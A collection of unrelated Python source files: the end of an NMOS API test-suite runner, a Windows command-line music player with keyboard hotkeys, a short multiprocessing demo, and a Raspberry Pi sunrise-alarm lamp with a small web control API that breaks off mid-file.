apis[api_key] = { "raml": SPECIFICATIONS[spec_key]["apis"][api_key]["raml"], "base_url": base_url, "url": "{}/x-nmos/{}/{}/".format(base_url, api_key, endpoints[index]["version"]), "spec_path": CACHE_PATH + '/' + spec_key, "version": endpoints[index]["version"], "spec": None # Used inside GenericTest } # Instantiate the test class if test == "IS-04-01": # This test has an unusual constructor as it requires a registry instance test_obj = test_def["class"](apis, REGISTRIES, NODE, DNS_SERVER) else: test_obj = test_def["class"](apis) core_app.config['TEST_ACTIVE'] = True try: result = test_obj.run_tests(test_selection) except Exception as ex: print(" * ERROR: {}".format(ex)) raise ex finally: core_app.config['TEST_ACTIVE'] = False return 
{"result": result, "name": test_def["name"], "base_url": base_url} else: raise NMOSInitException("This test definition does not exist") def init_spec_cache(): print(" * Initialising specification repositories...") if not os.path.exists(CACHE_PATH): os.makedirs(CACHE_PATH) # Prevent re-pulling of the spec repos too frequently time_now = datetime.now() last_pull_file = os.path.join(CACHE_PATH + "/last_pull") last_pull_time = time_now - timedelta(hours=1) update_last_pull = False if os.path.exists(last_pull_file): try: with open(last_pull_file, "rb") as f: last_pull_time = pickle.load(f) except Exception as e: print(" * ERROR: Unable to load last pull time for cache: {}".format(e)) for repo_key, repo_data in SPECIFICATIONS.items(): path = os.path.join(CACHE_PATH + '/' + repo_key) if not os.path.exists(path): print(" * Initialising repository '{}'".format(repo_data["repo"])) repo = git.Repo.clone_from('https://github.com/AMWA-TV/' + repo_data["repo"] + '.git', path) update_last_pull = True else: repo = git.Repo(path) repo.git.reset('--hard') # Only pull if we haven't in the last hour if (last_pull_time + timedelta(hours=1)) <= time_now: print(" * Pulling latest files for repository '{}'".format(repo_data["repo"])) try: repo.remotes.origin.pull() update_last_pull = True except Exception as e: print(" * ERROR: Unable to update repository '{}'. 
If the problem persists, " "please delete the '{}' directory".format(repo_data["repo"], CACHE_PATH)) if update_last_pull: try: with open(last_pull_file, "wb") as f: pickle.dump(time_now, f) except Exception as e: print(" * ERROR: Unable to write last pull time to file: {}".format(e)) print(" * Initialisation complete") def write_test_results(results, args): exit_code = ExitCodes.OK test_cases = [] for test_result in results["result"]: test_case = TestCase(test_result.name, elapsed_sec=test_result.elapsed_time, timestamp=test_result.timestamp) if test_result.name in args.ignore or test_result.state in [TestStates.DISABLED, TestStates.UNCLEAR, TestStates.MANUAL, TestStates.NA, TestStates.OPTIONAL]: test_case.add_skipped_info(test_result.detail) elif test_result.state in [TestStates.WARNING, TestStates.FAIL]: test_case.add_failure_info(test_result.detail, failure_type=str(test_result.state)) if test_result.state == TestStates.FAIL: exit_code = max(exit_code, ExitCodes.FAIL) elif test_result.state == TestStates.WARNING: exit_code = max(exit_code, ExitCodes.WARNING) elif test_result.state != TestStates.PASS: test_case.add_error_info(test_result.detail, error_type=str(test_result.state)) test_cases.append(test_case) ts = TestSuite(results["name"] + ": " + results["base_url"], test_cases) with open(args.output, "w") as f: TestSuite.to_file(f, [ts], prettyprint=False) print(" * Test results written to file: {}".format(args.output)) return exit_code def print_test_results(results, args): exit_code = ExitCodes.OK print("\r\nPrinting test results for suite '{}' using API '{}'".format(results["name"], results["base_url"])) print("----------------------------") total_time = 0 for test_result in results["result"]: if test_result.state == TestStates.FAIL: exit_code = max(exit_code, ExitCodes.FAIL) elif test_result.state == TestStates.WARNING: exit_code = max(exit_code, ExitCodes.WARNING) result_str = "{} ... 
{}".format(test_result.name, str(test_result.state)) print(result_str) total_time += test_result.elapsed_time print("----------------------------") print("Ran {} tests in ".format(len(results["result"])) + "{0:.3f}s".format(total_time) + "\r\n") return exit_code def parse_arguments(): parser = argparse.ArgumentParser(description='NMOS Test Suite') parser.add_argument('--suite', default=None, help="select a test suite to run tests from in non-interactive mode") parser.add_argument('--list', action='store_true', help="list available tests for a given suite") parser.add_argument('--selection', default="all", help="select a specific test to run, otherwise 'all' will be tested") parser.add_argument('--ip', default=list(), nargs="*", help="space separated IP addresses of the APIs under test") parser.add_argument('--port', default=list(), nargs="*", type=int, help="space separated ports of the APIs under test") parser.add_argument('--version', default=list(), nargs="*", help="space separated versions of the APIs under test") parser.add_argument('--ignore', default=list(), nargs="*", help="space separated test names to ignore the results from") parser.add_argument('--output', default=None, help="filename to save JUnit XML format test results to, otherwise print to stdout") return parser.parse_args() def validate_args(args): if args.suite: if args.suite not in TEST_DEFINITIONS: print(" * ERROR: The requested test suite '{}' does not exist".format(args.suite)) sys.exit(ExitCodes.ERROR) if args.list: tests = enumerate_tests(TEST_DEFINITIONS[args.suite]["class"]) for test_name in tests: print(test_name) sys.exit(ExitCodes.OK) if args.selection and args.selection not in enumerate_tests(TEST_DEFINITIONS[args.suite]["class"]): print(" * ERROR: Test with name '{}' does not exist in test definition '{}'" .format(args.selection, args.suite)) sys.exit(ExitCodes.ERROR) if len(args.ip) != len(args.port) or len(args.ip) != len(args.version): print(" * ERROR: IPs, ports and versions must 
contain the same number of elements") sys.exit(ExitCodes.ERROR) if len(args.ip) != len(TEST_DEFINITIONS[args.suite]["specs"]): print(" * ERROR: This test definition expects {} IP(s), port(s) and version(s)" .format(len(TEST_DEFINITIONS[args.suite]["specs"]))) sys.exit(ExitCodes.ERROR) def start_web_servers(): port = 5001 for app in FLASK_APPS: t = threading.Thread(target=app.run, kwargs={'host': '0.0.0.0', 'port': port, 'threaded': True}) t.daemon = True t.start() port += 1 t = threading.Thread(target=core_app.run, kwargs={'host': '0.0.0.0', 'port': 5000, 'threaded': True}) t.daemon = True t.start() def run_noninteractive_tests(args): endpoints = [] for i in range(len(args.ip)): endpoints.append({"ip": args.ip[i], "port": args.port[i], "version": args.version[i]}) try: results = run_tests(args.suite, endpoints, [args.selection]) if args.output: exit_code = write_test_results(results, args) else: exit_code = print_test_results(results, args) except Exception as e: print(" * ERROR: {}".format(str(e))) exit_code = ExitCodes.ERROR return exit_code class ExitCodes(IntEnum): ERROR = -1 # General test suite error OK = 0 # Normal exit condition, or all tests passed in non-interactive mode WARNING = 1 # Worst case test was a warning in non-interactive mode FAIL = 2 # Worst case test was a failure in non-interactive mode if __name__ == '__main__': # Check if we're testing unicast DNS discovery, and if so ensure we have elevated privileges if ENABLE_DNS_SD and DNS_SD_MODE == "unicast": is_admin = False if platform.system() == "Windows": from ctypes import windll if windll.shell32.IsUserAnAdmin(): is_admin = True elif os.geteuid() == 0: is_admin = True if not is_admin: print(" * ERROR: In order to test DNS-SD in unicast mode, the test suite must be run with elevated permissions") sys.exit(ExitCodes.ERROR) # Parse and validate command line arguments args = parse_arguments() validate_args(args) # Download up to date versions of each API specification init_spec_cache() # Start 
the DNS server if ENABLE_DNS_SD and DNS_SD_MODE == "unicast": DNS_SERVER = DNS() # Start the HTTP servers start_web_servers() exit_code = 0 if not args.suite: # Interactive testing mode. Await user input. try: while True: time.sleep(0.2) except KeyboardInterrupt: pass else: # Non-interactive testing mode. Tests carried out automatically. exit_code = run_noninteractive_tests(args) # Testing complete print(" * Exiting") # Stop the DNS server if DNS_SERVER: DNS_SERVER.stop() # Exit the application with the desired code sys.exit(exit_code)
main.py
import keyboard import time import os from win32gui import GetWindowText, GetForegroundWindow from pygame import mixer import datetime import threading import webbrowser import sys from prettytable import PrettyTable import random #import Finished #os change os.system("Cls") #clears screen os.system("title Geet -cli") #change title #extra commandTable = PrettyTable(["Command", "Info",'Example']) #for hint table rainbow_colors = ['#FF0900', '#FF7F00', ' #FFEF00', '#00F11D', ' #0079FF', ' #A800FF'] #for rainbow colored prints valid_hex = '0123456789ABCDEF'.__contains__ #constrains for printing colors typing_time = 0.05 #typing speed selected = 1 #selected rainbow_loop_after = 2 #rainbow new color after ? loops rainbow_currently_at=0 #global rainbow value #printing Info in the screen home_info_array = ['[Enter]/ Play -- To play previously played song. -- play','F-[Path] -- To enter a new path. -- f-C:/Users/natur/Downloads/Music','Git -- To go to Github Page -- git', 'Mail -- To mail the creator -- mail'] #hints home_about_array = ['A Command line interface mp3 player with many features.','Experimantal project (Created in a day).','Hit [Enter] to play previous played File.', 'Type Dir of music file to play from that file.'] #shown at the home page info_array = ['press [Space] To Play or Pause','Press [<-] [->] (horizontal arrow keys) to control volume.', 'Press [^] [v] (vertical arrow keys) to browse through file and press [Enter] to play', 'Press [L] to loop forever.', 'Press [R] to randomly play song.' 
, 'Press [E] / [Esc] to Exit.', 'Press [G] to go to Github'] #info shown while playing audio #music data music_path='' #path of going to be played audio music_in_file=[] #all music files name is stored here currently_playing = 'f.mp3' #currently playing audio currently_playing_index = 0 #currently playing audio index with ref to music_in_file[] volume_level= 0.7 #volume of music player music_length = '0:03:19' #music length of currently playing audio #geetdata browse_pointer_position = 0 #where the pointer is with ref to music_in_file[] loop_forever = False #loops the audio forever randomize_music = False # randomize audio is_pause = False #audio paused? notExit = True #does the user want to exit the program #terminal size col = '150' #width lines = '41' #height #logo geet_logo_txt = open('logo.txt','r') #read file geet_logo_split = geet_logo_txt.read().split('\n') #change to array geet_logo_txt.close() #close file #project git page def githubPage(): if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #check window name webbrowser.open_new('https://github.com/sairash/spotify-1975') #open browser #mail the creator def mailME(): if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #check window name webbrowser.open_new('mailto:nation.ance@gmail.com') #open browser #change terminal size def terminal_size(): os.system('mode con: cols='+col+' lines='+lines+'') #change size of terminal return(col,lines) #return value #clean the hex code def clean_hex(data): return ''.join(filter(valid_hex, data.upper())) #better hex code #Print Colors def printC(text, color='#ffffff', end='\n'): hexint = int(clean_hex(color), 16) #get int of hexcode print("\x1B[38;2;{};{};{}m{}\x1B[0m".format(hexint>>16, hexint>>8&0xFF, hexint&0xFF, text),end=end) #prints color in the cmd window #Print Animation def printA(text, end='\n',fore_color='#ffffff',back_color='#000000'): start_typing=False back_hex_int = int(clean_hex(fore_color), 16) #chnage to hex fore_hex_int = 
int(clean_hex(back_color), 16) #chnage to hex text = text+end #add text with end data for character in text: if character==':': #initaial start_typing = not start_typing #change started value else: if start_typing: #if initiated sys.stdout.write("\x1B[48;2;{};{};{}m\x1B[38;2;{};{};{}m{}\x1B[0m".format(fore_hex_int >> 16, fore_hex_int >> 8 & 0xFF, fore_hex_int & 0xFF, back_hex_int >> 16, back_hex_int >> 8 & 0xFF, back_hex_int & 0xFF, character)) #type characters sys.stdout.flush() time.sleep(typing_time) #wait before printing another characters else: print(' ',end='') #Middle without typing #make animatable def make_animateable(string,center=True): string_to_return = ':'+string+':' #add : to make it animatable if center: #want text at center? return(string_to_return.center(int(console_x))) #adds spaces to make it look like it is in the center else: return(string_to_return) #returns without adding spaces #make a string colorful def print_rainbow_colors_loop(string): global rainbow_currently_at #global value currently_in_function = 0 #change data per function call for letter in string: #per letter string printC(letter, color=rainbow_colors[rainbow_currently_at], end='') #print color #change rainbow color if currently_in_function % 2 == 0: rainbow_currently_at += 1 if rainbow_currently_at % 6 == 0: rainbow_currently_at = 0 currently_in_function += 1 #welcome page input command def take_input_command_home(): global music_in_file, music_path , currently_playing, total_music_in_file #global variables while True: command = input('\033[4mGeet\033[0m: > ').lower() #input command #checking commnd if command == 'hint': for info in home_info_array: #reading hint array all_info = info.split(' -- ') #spliting for data commandTable.add_row(all_info) #adding to the table print(commandTable) #showing table elif command == 'git': printA(make_animateable('Opening browser:',center=False), fore_color='#000000', back_color='#00F11D') #print info with animation githubPage() #show git page 
elif command == 'mail': printA(make_animateable('Opening browser:',center=False), fore_color='#000000', back_color='#00F11D') #print info with animation mailME() #show mail page elif command == '' or command == 'play': song_data = open('data.txt','r') #opening database xD song_data_split = song_data.read().split('\n') #split the data song_data.close() #closing database to clear memory if len(song_data_split)==0: print('\033[4mGeet\033[0m: > No Data Please Specify a path using p-[Path] command') #if nothing in db ask to give data else: music_path = song_data_split[0] #putting path data to music_path currently_playing = song_data_split[1] #putting currently playing data from database for root, subdirs, files in os.walk(song_data_split[0]): #go through the path to get every audio file for file in files: if os.path.splitext(file)[1].lower() in ('.mp3', '.wav', '.ogg', '.xm', '.mod'): #select only audio file music_in_file.append(file) #audiofile appended to playable list total_music_in_file = len(music_in_file) break #break the loop elif command[0] == 'f': number_of_files = 0 printA(make_animateable('Wait going through files! 
',center=False), fore_color='#000000', back_color='#00F11D') #animating info path=command[2:] #getting everything after 2 element for root, subdirs, files in os.walk(path): #go through the path to get every audio file for file in files: if os.path.splitext(file)[1].lower() in ('.mp3', '.wav', '.ogg', '.xm', '.mod'): #select only audio file music_in_file.append(file) #audiofile appended to playable list number_of_files +=1 if number_of_files > 0: first_file = music_in_file[0] #putting the first element in first file to add at currently playing print(path, first_file) #writing data to database song_data = open('data.txt','w') music_path = path song_data.write(path) song_data.write('\n') song_data.write(first_file) song_data.close() currently_playing = first_file #adding to currently playing total_music_in_file = len(music_in_file) #total music in file added break #break the loop else: printA(make_animateable('No Playable Audiofile found. ',center=False), fore_color='#ffffff', back_color='#ff0000') #animating info print('',end='') else: printA(make_animateable('Invalid command: ',center=False), fore_color='#ffffff', back_color='#ff0000') #animating info print('',end='') #welcome page display def main(): os.system("Cls") #clearing screen for line in geet_logo_split: #for everyline in logo print_rainbow_colors_loop(line.center(int(console_x))) #printing logo printA(make_animateable(' Welcome To Spotify-1975 a music player in cmd '), back_color='#FFEF00', fore_color='#000000') #animating info printA(make_animateable(' To play music press the enter or put in the path and hit enter.'), back_color='#FFEF00', fore_color='#000000') #animating info print() print('--------------------------------------------------------------About---------------------------------------------------------------'.center(int(console_x))) for line in home_about_array: #print every line info print(" | "+line+" "*(130-len(line)-3)+"|") 
print('----------------------------------------------------------------------------------------------------------------------------------'.center(int(console_x))) print() print_rainbow_colors_loop('Creator - Sairash'.center(int(console_x))) #printing rainbow color creator print_rainbow_colors_loop('git: https:/www.github.com/sairash/geet'.center(int(console_x))) #printing git link rainbow print('\033[4mGeet\033[0m: > "Eg: Hint"') # print hint take_input_command_home() #enter command music_play() #initial music play #init play music def music_play(): global music_length_seconds, music_length, currently_playing_index, browse_pointer_position #global variable #music player mixer.init() #starting the mixer print(music_path+currently_playing) mixer.music.load(music_path+'/'+currently_playing) #loading the song a = mixer.Sound(music_path+'/'+currently_playing) #loading the song for its length music_length = str(datetime.timedelta(seconds=int(a.get_length()))) #changing the music length variable music_length_seconds = int(a.get_length()) # Setting the volume mixer.music.set_volume(volume_level) # Start playing the song mixer.music.play() currently_playing_index = music_in_file.index(currently_playing) browse_pointer_position = currently_playing_index #progress bar def progressBar(currently_at,total_length,number_of_dash): currently_at_percent = int(int(currently_at) * 100/ total_length) #percentage of current position should_be_placed_at = int(currently_at_percent/100 * number_of_dash) #percentage of current position with respective to number of dash data_to_return = '' for x in range(number_of_dash): #putting value if x < should_be_placed_at: data_to_return += '=' #placing = for already played elif x > should_be_placed_at: data_to_return += '-' #placing - for remaining music else: data_to_return += '█' # placing cursor return data_to_return #returning string #play selected selected song def play_selected_song(number): global a, music_length, music_length_seconds, 
currently_playing_index, currently_playing, browse_pointer_position #global variable mixer.music.load(music_path+'/'+music_in_file[number]) #loading the song a = mixer.Sound(music_path+'/'+music_in_file[number]) #loading the song for its length music_length = str(datetime.timedelta(seconds=int(a.get_length()))) #changing the music length variable music_length_seconds = int(a.get_length()) # Setting the volume mixer.music.set_volume(volume_level) # Start playing the song mixer.music.play() currently_playing_index=number currently_playing = music_in_file[currently_playing_index] song_data = open('data.txt','w') # writing new in database song_data.write(music_path) song_data.write('\n') song_data.write(currently_playing) song_data.close() browse_pointer_position= number #changing browser pointer position cli_refresh() #refresh gui #printing cli all music with ... at last def cli_audio_names(audio_name): split_audio_name=audio_name.split('.') #split audio name with . audio_name=split_audio_name[:-1] #audio name is everything except last audio_name = '.'.join(audio_name) #joining audio name extension = split_audio_name[-1] #get extension name file_name = '' if len(audio_name) > 75: file_name = audio_name[:75] + '..' #file name with .. at end else: file_name = audio_name file_name +='.'+extension #adding extension at end return file_name #returning string #check whether to display L or not def get_loop_forever(): if loop_forever: return 'L' else: return ' ' #check whether to display R or not def get_randomize_music(): if randomize_music: return 'R' else: return ' ' #when music finishes what to do? 
def on_music_finished():
    """Pick what to play once the current track ends (loop / shuffle / next)."""
    if loop_forever:
        mixer.music.play() # play the same music again
    elif randomize_music:
        # NOTE(review): randint(1, total-1) can never pick index 0 -- confirm the
        # first track is meant to be excluded from shuffle.
        play_selected_song(random.randint(1,total_music_in_file-1)) #get random number from 1 to total music data in music_in_file array
    else:
        play_next = currently_playing_index+1 #else play next in the list
        if play_next >= total_music_in_file:
            play_selected_song(0) # past the last track: wrap around to the first
        else:
            play_selected_song(play_next)

#for exit when [e] or [Esc] is pressed
def exit():
    """Request shutdown of the CLI refresh thread.

    NOTE(review): shadows the builtin exit(); consider renaming in a future change.
    """
    if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #only react while our console window is focused
        global notExit #global flag polled by cli()
        notExit = False #end thread job

#when [Space] is pressed
def space():
    """Toggle pause/unpause of the current track."""
    if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #only react while our console window is focused
        global is_pause #global variable
        if is_pause:
            mixer.music.unpause() #unpause music
            is_pause = False #change to opposite
        else:
            mixer.music.pause() #pause music
            is_pause = True #change to opposite
        cli_refresh() #refresh gui

#when [L] is pressed
def loop_forever_function():
    """Toggle the loop-forever flag (shown as 'L' in the status bar)."""
    global loop_forever
    if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #only react while our console window is focused
        loop_forever = not(loop_forever) #change to opposite
        cli_refresh() #refresh gui

#when [R] is pressed
def randomize_music_function():
    """Toggle the shuffle flag (shown as 'R' in the status bar)."""
    global randomize_music
    if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #only react while our console window is focused
        randomize_music = not(randomize_music) #change to opposite
        cli_refresh() #refresh gui

#when [right arrow] is pressed (bound in initiate_keyborde_logic)
def volumeUp():
    """Raise volume by 0.1, capped below 1.0, and redraw the UI."""
    global volume_level #global value
    if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #only react while our console window is focused
        if volume_level < .9: #if less than 1[max]
            volume_level += .1 #change value
            mixer.music.set_volume(volume_level) #change volume
        cli_refresh() #refresh gui

#when [left arrow] is pressed (bound in initiate_keyborde_logic)
def volumeDown():
    """Lower volume by 0.1, floored at 0, and redraw the UI."""
    global volume_level #global value
    if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #only react while our console window is focused
        if volume_level > 0: #if greater than 0 [min]
            volume_level -= .1 #change value
            mixer.music.set_volume(volume_level) #change volume
        cli_refresh() #refresh gui

#when [up arrow] is pressed
def browseUp():
    """Move the track-browser cursor up one entry (clamped at the top)."""
    global browse_pointer_position #global value
    if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #only react while our console window is focused
        if browse_pointer_position <= 0: #if less than 0 [min]
            browse_pointer_position = 0 #set position 0
        else: #if greater than 0 [min]
            browse_pointer_position -=1 #set position -1
        cli_refresh() #refresh gui

#when [down arrow] is pressed
def browseDown():
    """Move the track-browser cursor down one entry (clamped at the bottom)."""
    global browse_pointer_position #global value
    if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #only react while our console window is focused
        if browse_pointer_position+1 >= total_music_in_file: #if less than total music in array [max]
            browse_pointer_position = total_music_in_file - 1 #set position total music in array -1
        else: #if greater than total music in array [max]
            browse_pointer_position +=1 #set position +1
        cli_refresh() #refresh gui

#when [Enter] is pressed
def file_select_enter():
    """Play the track currently under the browser cursor."""
    if GetWindowText(GetForegroundWindow()) == 'Geet -cli': #only react while our console window is focused
        input('Loading... ') #consume the pending Enter keypress from stdin [important]
        play_selected_song(browse_pointer_position) #playing music at browse position

#gets keypress
def initiate_keyborde_logic():
    """Register all global hotkeys with the `keyboard` library."""
    keyboard.add_hotkey('g', githubPage) #detects keypress
    keyboard.add_hotkey('l', loop_forever_function) #detects keypress
    keyboard.add_hotkey('r', randomize_music_function) #detects keypress
    keyboard.add_hotkey('e', exit) #detects keypress
    keyboard.add_hotkey('esc', exit) #detects keypress
    keyboard.add_hotkey('space', space) #detects keypress
    keyboard.add_hotkey('left', volumeDown) #detects keypress
    keyboard.add_hotkey('right',volumeUp) #detects keypress
    keyboard.add_hotkey('up', browseUp) #detects keypress
    keyboard.add_hotkey('down', browseDown) #detects keypress
    keyboard.add_hotkey('enter', file_select_enter) #detects keypress

#display music player gui
def cli_refresh():
    """Redraw the whole console UI (logo, track list, lyrics, info, controls).

    Also detects end-of-track by comparing the play position against the
    track length, and advances via on_music_finished().
    """
    if str(datetime.timedelta(seconds=int(mixer.music.get_pos()/1000))) == music_length: #check if music finished
        on_music_finished() #on music finished
    console_x, console_y=terminal_size() #get and make terminal size
    #print logo
    for line in geet_logo_split:
        print_rainbow_colors_loop(line.center(int(console_x))) #print in rainbow color
    print_rainbow_colors_loop(datetime.datetime.now().strftime("%H:%M:%S").center(int(console_x))) #print clock in rainbow colors
    print()
    print('---------------------------------------------------------------Open---------------------------------------------------------------'.center(int(console_x)))
    #print all music and select: show a 10-entry window of the playlist around the cursor
    if(browse_pointer_position+10 >= total_music_in_file): #cursor near the end: pin the window to the last 10 tracks
        for music in range(total_music_in_file-10,total_music_in_file):
            if music == browse_pointer_position:
                file_name = cli_audio_names(music_in_file[music]+' <') #if index is same as browse pointer position
            else:
                file_name = cli_audio_names(music_in_file[music]) #if index is not same
            if music_in_file[music] == currently_playing: #highlight the currently playing track in yellow
                print(" | ",end='')
                printC(file_name,color='#ffff00',end='')
                printC(" "*(130-len(file_name)-3),color='#ff0000',end='')
                print("|")
            else:
                print(" | "+file_name+" "*(130-len(file_name)-3)+"|") #if not same as currently playing
    else: #cursor elsewhere: window starts at the cursor (same rendering as above)
        for music in range(browse_pointer_position,browse_pointer_position+10): #not for ending
            if music == browse_pointer_position:
                file_name = cli_audio_names(music_in_file[music]+' <') #if index is same as browse pointer position
            else:
                file_name = cli_audio_names(music_in_file[music]) #if index is not same
            if music_in_file[music] == currently_playing: #highlight the currently playing track in yellow
                print(" | ",end='')
                printC(file_name,color='#ffff00',end='')
                printC(" "*(130-len(file_name)-3),color='#ff0000',end='')
                print("|")
            else:
                print(" | "+file_name+" "*(130-len(file_name)-3)+"|") #if not same as currently playing
    print('----------------------------------------------------------------------------------------------------------------------------------'.center(int(console_x)))
    print('--------------------------------------------------------------Lyrics--------------------------------------------------------------'.center(int(console_x)))
    lyrics_comming_soon='Lyrics Comming Soon'
    print(" | "+lyrics_comming_soon+" "*(130-len(lyrics_comming_soon)-3)+"|") #lyrics display area (placeholder)
    for music in range(4): #pad the lyrics box with empty rows
        file_name = ''
        print(" | "+file_name+" "*(130-len(file_name)-3)+"|")
    print('----------------------------------------------------------------------------------------------------------------------------------'.center(int(console_x)))
    print('---------------------------------------------------------------Info---------------------------------------------------------------'.center(int(console_x)))
    for info in info_array:
        print(" | "+info+" "*(130-len(info)-3)+"|")
    print('----------------------------------------------------------------------------------------------------------------------------------'.center(int(console_x)))
    print()
    print_rainbow_colors_loop('Creator - Sairash'.center(int(console_x))) #creator with rainbow colors display
    #status bar: play/pause glyph, elapsed, progress bar, length, volume bar, L/R flags
    if (is_pause):
        print(' ► {1} {2} {0} ◄) {3}   {5} {4}'.format(music_length,datetime.timedelta(seconds=int(mixer.music.get_pos()/1000)), progressBar(int(mixer.music.get_pos()/1000), music_length_seconds,46), progressBar(int(volume_level*100), 100,10),get_loop_forever(),get_randomize_music()).center(int(console_x))) #if paused is true controller
    else:
        print('▐▐ {1} {2} {0} ◄) {3}   {5} {4}'.format(music_length,datetime.timedelta(seconds=int(mixer.music.get_pos()/1000)), progressBar(int(mixer.music.get_pos()/1000), music_length_seconds,46), progressBar(int(volume_level*100), 100,10),get_loop_forever(),get_randomize_music()).center(int(console_x))) #if not paused controller

#command line interface
def cli():
    """Background loop: redraw the UI once a second until notExit is cleared."""
    while notExit:
        cli_refresh()
        time.sleep(1)

#console_window -- top-level startup sequence
console_x, console_y = terminal_size() #resize and get height and length
os.system("title Geet -cli") #change title just in case
main() #welcome Screen
cli_thread = threading.Thread(target=cli) #initiating parallel processing in gui
cli_thread.start() #gui start
initiate_keyborde_logic() #adding keypress logics
cli_thread.join() #when exit is pressed the refresh thread ends and the program exits
multi_processing.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# FileName:multi_processing.py
"""Minimal demo of spawning a child process with the multiprocessing module."""
from multiprocessing import Process
import os


def run_proc(name):
    """Entry point executed inside the child process; reports its name and PID."""
    print('Run child process %s(%s)' % (name, os.getpid()))


def _main():
    """Fork a single child, wait for it to finish, and log progress."""
    print('Parent process %s' % os.getpid())
    child = Process(target=run_proc, args=('test',))
    print('child process will start...')
    child.start()
    child.join()
    print('Child process end')


if __name__ == '__main__':
    _main()
d.light.py
#!/usr/bin/python
"""Sunrise alarm lamp.

Three cooperating processes share a Manager dict (``state``):
  - scheduler: watches the clock and ramps brightness up at alarm time
  - light:     drives an 8-bit GPIO "DAC" from state['on'] / state['dim']
  - web:       bottle web UI / JSON API that mutates the shared state

The snooze button is signalled through a multiprocessing.Event (``esnooze``).
"""
import config
from multiprocessing import Process, Manager, Event

def scheduler(dummy,state,esnooze):
    """Run the alarm loop: start brightening early so full brightness is
    reached at the configured alarm time.

    :param dummy: unused placeholder (kept for Process args compatibility)
    :param state: shared Manager dict holding alarm/light settings
    :param esnooze: Event set by the web UI to snooze or abort the alarm
    """
    import time
    from datetime import datetime, timedelta
    while True:
        now = datetime.now()
        # Ramp starts `brightentime` minutes before the alarm time proper.
        at = datetime.strptime(state['alarmtime'],'%H:%M')-timedelta(minutes=state['brightentime'])
        if at.hour == now.hour and at.minute == now.minute and now.second <= 2 and state['alarmset']:
            state['alarming'] = True
            i = int(config.dimlow)
            while state['alarming'] and state['alarmset']:
                if esnooze.is_set():
                    # Snooze pressed: restart the ramp and go dark for a while.
                    i = int(config.dimlow)
                    esnooze.clear()
                    if state['alarming']:
                        state['dim'] = 0
                        state['on'] = False
                        esnooze.wait(state['snoozetime']*60)
                    if not state['alarming']:
                        # Alarm was switched off while snoozing.
                        esnooze.clear()
                        break
                state['dim'] = (float(i)-config.dimlow)/config.dimrange*100
                state['on'] = True
                # Spread the ramp over `brightentime` minutes / `dimrange` steps;
                # the wait doubles as the snooze-interrupt point.
                esnooze.wait(state['brightentime']*60./float(config.dimrange))
                if i < config.dimhigh:
                    i = i+1
        time.sleep(1)

def light(dummy,state):
    """Continuously translate state['on']/state['dim'] into GPIO levels.

    The eight pins form one byte; outputs are active-low, hence the
    ``not dim & bit`` writes.
    """
    import RPi.GPIO as GPIO
    import time
    p1 = config.p1
    p2 = config.p2
    p4 = config.p4
    p8 = config.p8
    p16 = config.p16
    p32 = config.p32
    p64 = config.p64
    p128 = config.p128
    GPIO.setmode(GPIO.BCM)
    GPIO.setwarnings(False)
    GPIO.setup(p1,GPIO.OUT)
    GPIO.setup(p2,GPIO.OUT)
    GPIO.setup(p4,GPIO.OUT)
    GPIO.setup(p8,GPIO.OUT)
    GPIO.setup(p16,GPIO.OUT)
    GPIO.setup(p32,GPIO.OUT)
    GPIO.setup(p64,GPIO.OUT)
    GPIO.setup(p128,GPIO.OUT)
    try:
        while True:
            if state['on'] == True:
                if state['dim'] == 0:
                    dim = 0
                    state['on'] = False
                elif state['dim'] == 100:
                    dim = 255
                else:
                    dim = int(state['dim']/100.*config.dimrange+config.dimlow)
                GPIO.output(p1,not dim&1)
                GPIO.output(p2,not dim&2)
                GPIO.output(p4,not dim&4)
                GPIO.output(p8,not dim&8)
                GPIO.output(p16,not dim&16)
                GPIO.output(p32,not dim&32)
                GPIO.output(p64,not dim&64)
                GPIO.output(p128,not dim&128)
            else:
                # Off: all pins high (active-low).
                GPIO.output(p1,True)
                GPIO.output(p2,True)
                GPIO.output(p4,True)
                GPIO.output(p8,True)
                GPIO.output(p16,True)
                GPIO.output(p32,True)
                GPIO.output(p64,True)
                GPIO.output(p128,True)
            # BUG FIX: was bare `sleep(.1)`, which only worked because the
            # forked child inherited `from time import sleep` executed inside
            # the parent's __main__ guard; breaks under the spawn start method.
            time.sleep(.1)
    except Exception:
        # Best-effort: the original swallowed all errors here (and then ran
        # GPIO.cleanup() twice, once in except and once in finally).
        pass
    finally:
        GPIO.cleanup()

def web(dummy,state,esnooze):
    """Serve the control web UI and JSON API (bottle) on config.wwwport."""
    from bottle import route, run, get, post, request, static_file, abort
    import time
    import os
    from datetime import datetime
    wwwroot = os.path.dirname(__file__)+'/www'

    @route('/')
    def docroot():
        return static_file('index.html',wwwroot)

    @route('/light/<sw>')
    def light(sw):
        if sw == "on":
            state['dim'] = 100.
            state['on'] = True
            return dict(state)
        elif sw == "off":
            state['alarming'] = False
            state['dim'] = 0.
            state['on'] = False
            return dict(state)
        else:
            # BUG FIX: was `return false` (NameError -> HTTP 500); report a
            # client error like the /alarm/<sw> route does.
            abort(400,'Invalid light setting.')

    @route('/alarm/<sw>')
    def alarm(sw):
        if sw == 'on':
            state['alarmset'] = True
            return dict(state)
        elif sw == 'off':
            if state['alarming']:
                # Abort a ramp in progress before disarming.
                state['alarming'] = False
                state['dim'] = 0
                esnooze.set()
            state['alarmset'] = False
            return dict(state)
        else:
            abort(400,'Invalid alarm setting.')

    @route('/alarmset/<t>')
    def alarmset(t):
        try:
            datetime.strptime(t,'%H:%M')
        except ValueError:
            # Narrowed from bare `except:`: only a bad time string is a 400.
            abort(400,'Invalid time format.')
        state['alarmtime'] = t
        return dict(state)

    @route('/snoozeset/<t:int>')
    def snoozeset(t):
        state['snoozetime'] = float(t)
        return dict(state)

    @route('/brightenset/<t:int>')
    def brightenset(t):
        state['brightentime'] = float(t)
        return dict(state)

    @route('/dim/<dimval:int>')
    def dim(dimval):
        state['on'] = True
        state['dim'] = float(dimval)
        return dict(state)

    @route('/snooze')
    def snooze():
        esnooze.set()
        return dict(state)

    @route('/alarmoff')
